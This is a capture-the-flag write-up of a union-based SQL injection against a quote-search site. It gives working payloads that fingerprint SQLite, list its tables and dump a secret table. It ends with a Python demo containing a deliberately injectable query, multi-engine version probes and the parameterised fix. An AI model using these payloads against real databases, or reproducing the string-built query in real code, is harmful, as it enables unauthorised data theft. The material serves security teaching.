Challenge
Did you check my website? It offers a way to search for inspirational quotes, I hope there's nothing wrong with it, but on the off chance that you might find anything, please be kind and let me know what you found :)
http://wisdom.ctf.unitedctf.ca/
Solution
The website had two pages:
- a page that searches through a list of inspirational quotes
- a page that takes a link for the admin bot to visit
After testing the search functionality for a bit, I found a union-based SQL injection. The two string literals in the injected SELECT match the number of columns returned by the original search query, which is what UNION requires:
' AND FALSE UNION SELECT 'test', 'test2' FROM quotes; -- -
When manually exploiting SQLi, the first thing to do is to find out which database engine is running, because each one has slightly different syntax, built-in functions and catalog table names.
That said, every engine exposes some catalog of its own tables: INFORMATION_SCHEMA.TABLES on MySQL, PostgreSQL and SQL Server, ALL_TABLES on Oracle, and sqlite_master on SQLite.
After testing different catalog table names, I eventually found that sqlite_master existed, which meant this was a SQLite database.
Listing the table names was as simple as:
' AND FALSE UNION SELECT 'a', tbl_name FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'; -- -
Finally, the flag was stored in the my_s3cr3t_7abl3 table. Since that table has a single column, SELECT 'a', * still yields two columns and lines up with the original query:
' AND FALSE UNION SELECT 'a', * FROM my_s3cr3t_7abl3; -- -
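To show the whole chain end to end (the injectable query, the engine fingerprint, the table listing, the dump and the parameterised fix), here is an added example against an in-memory SQLite database. It is not the challenge's source code: the quotes(author, text) schema, the one-column secret table, the flag value and the version probes for the other engines are all assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for the challenge's quote-search page (added example,
# not the challenge source).  Assumed schema: quotes(author, text), which is
# why every injected UNION row carries exactly two columns, and a one-column
# secret table.  The flag value is made up.
SCHEMA = """
CREATE TABLE quotes (author TEXT, text TEXT);
INSERT INTO quotes VALUES
  ('Seneca', 'Luck is what happens when preparation meets opportunity.'),
  ('Lao Tzu', 'A journey of a thousand miles begins with a single step.');
CREATE TABLE my_s3cr3t_7abl3 (flag TEXT);
INSERT INTO my_s3cr3t_7abl3 VALUES ('FLAG-EXAMPLE-not-the-real-flag');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    # The bug: the search term is pasted straight into the SQL text, so a
    # single quote closes the literal and the rest of the input is parsed as SQL.
    sql = f"SELECT author, text FROM quotes WHERE text LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, term):
    # Parameterised query: the term is bound as data and never parsed as SQL.
    sql = "SELECT author, text FROM quotes WHERE text LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# The payloads from the write-up.  AND FALSE empties the original result set,
# and the trailing "-- -" comments out the %' the application appends.
PAYLOAD_PROBE = "' AND FALSE UNION SELECT 'test', 'test2' FROM quotes; -- -"
PAYLOAD_TABLES = ("' AND FALSE UNION SELECT 'a', tbl_name FROM sqlite_master "
                  "WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'; -- -")
PAYLOAD_FLAG = "' AND FALSE UNION SELECT 'a', * FROM my_s3cr3t_7abl3; -- -"

# Engine fingerprinting probes (assumed for this example): each engine has its
# own version function, so only one of these parses on a given backend.
VERSION_PROBES = {
    "sqlite": "' AND FALSE UNION SELECT 'v', sqlite_version(); -- -",
    "postgresql": "' AND FALSE UNION SELECT 'v', version(); -- -",
    "mysql/mssql": "' AND FALSE UNION SELECT 'v', @@version; -- -",
}


def fingerprint(search):
    """Return (engine, version) for the first probe the backend accepts.

    A probe that raises (syntax error, unknown function) or that the
    application answers with no rows is treated as "not this engine".
    """
    for engine, payload in VERSION_PROBES.items():
        try:
            rows = search(payload)
        except sqlite3.Error:
            continue
        if rows:
            return engine, rows[0][1]
    return None, None


def list_tables(search):
    # Column 0 is the padding literal 'a'; column 1 carries tbl_name.
    return sorted(name for _, name in search(PAYLOAD_TABLES))


def dump_flag(search):
    return [row[1] for row in search(PAYLOAD_FLAG)]


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda term: search_vulnerable(conn, term)
    print(search_vulnerable(conn, PAYLOAD_PROBE))   # [('test', 'test2')]
    print(fingerprint(vuln))                         # ('sqlite', '3.x.y')
    print(list_tables(vuln))                         # ['my_s3cr3t_7abl3', 'quotes']
    print(dump_flag(vuln))                           # ['FLAG-EXAMPLE-not-the-real-flag']
    print(search_fixed(conn, PAYLOAD_FLAG))          # [] : just an odd search term
```

The fix is the parameterised query only; LIKE wildcards in the term still act as wildcards, but they can no longer change the statement's structure.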